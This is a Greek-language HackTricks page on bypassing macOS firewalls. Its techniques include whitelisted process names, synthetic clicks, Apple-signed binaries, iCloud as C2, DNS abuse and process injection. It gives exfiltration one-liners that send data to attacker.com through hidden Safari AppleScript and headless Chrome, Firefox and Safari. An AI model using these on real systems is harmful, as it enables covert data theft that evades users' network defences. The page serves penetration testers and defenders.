hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

6.5 KiB
Raw Blame History

Διάβρωση Τειχών Προστασίας στο macOS

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Τεχνικές που βρέθηκαν

Οι παρακάτω τεχνικές βρέθηκαν να λειτουργούν σε ορισμένες εφαρμογές τείχους προστασίας στο macOS.

Κατάχρηση ονομάτων λευκής λίστας

  • Για παράδειγμα, να ονομάζεται ο κακόβουλος κώδικας με ονόματα γνωστών διεργασιών του macOS όπως το launchd

Συνθετικό Κλικ

  • Εάν το τείχος προστασίας ζητάει άδεια από τον χρήστη, ο κακόβουλος κώδικας μπορεί να κάνει κλικ στο "επιτρέπω"

Χρήση υπογεγραμμένων δυαδικών αρχείων της Apple

  • Όπως το curl, αλλά και άλλα όπως το whois

Γνωστοί τομείς της Apple

Το τείχος προστασίας μπορεί να επιτρέπει συνδέσεις σε γνωστούς τομείς της Apple, όπως το apple.com ή το icloud.com. Και η iCloud μπορεί να χρησιμοποιηθεί ως C2.

Γενική Διάβαση

Ορισμένες ιδέες για να προσπαθήσετε να διαβείτε τα τείχη προστασίας

Έλεγχος της επιτρεπόμενης κίνησης

Γνωρίζοντας την επιτρεπόμενη κίνηση, μπορείτε να αναγνωρίσετε δυνητικά τομείς που βρίσκονται στη λευκή λίστα ή ποιες εφαρμογές έχουν άδεια πρόσβασης σε αυτούς.

lsof -i TCP -sTCP:ESTABLISHED

Κατάχρηση του DNS

Οι αναλύσεις DNS γίνονται μέσω της εφαρμογής mdnsreponder που έχει υπογραφή και πιθανότατα θα επιτραπεί να επικοινωνήσει με τους διακομιστές DNS.

https://www.youtube.com/watch?v=UlT5KFTMn2k

Μέσω εφαρμογών περιήγησης

  • oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
  • Google Chrome

{% code overflow="wrap" %}

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

{% endcode %}

  • Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
  • Περιήγηση Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Μέσω εισαγωγής διεργασιών

Εάν μπορείτε να εισάγετε κώδικα σε μια διεργασία που επιτρέπεται να συνδεθεί σε οποιονδήποτε διακομιστή, μπορείτε να παρακάμψετε τις προστασίες του τείχους προστασίας:

{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}

Αναφορές

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks: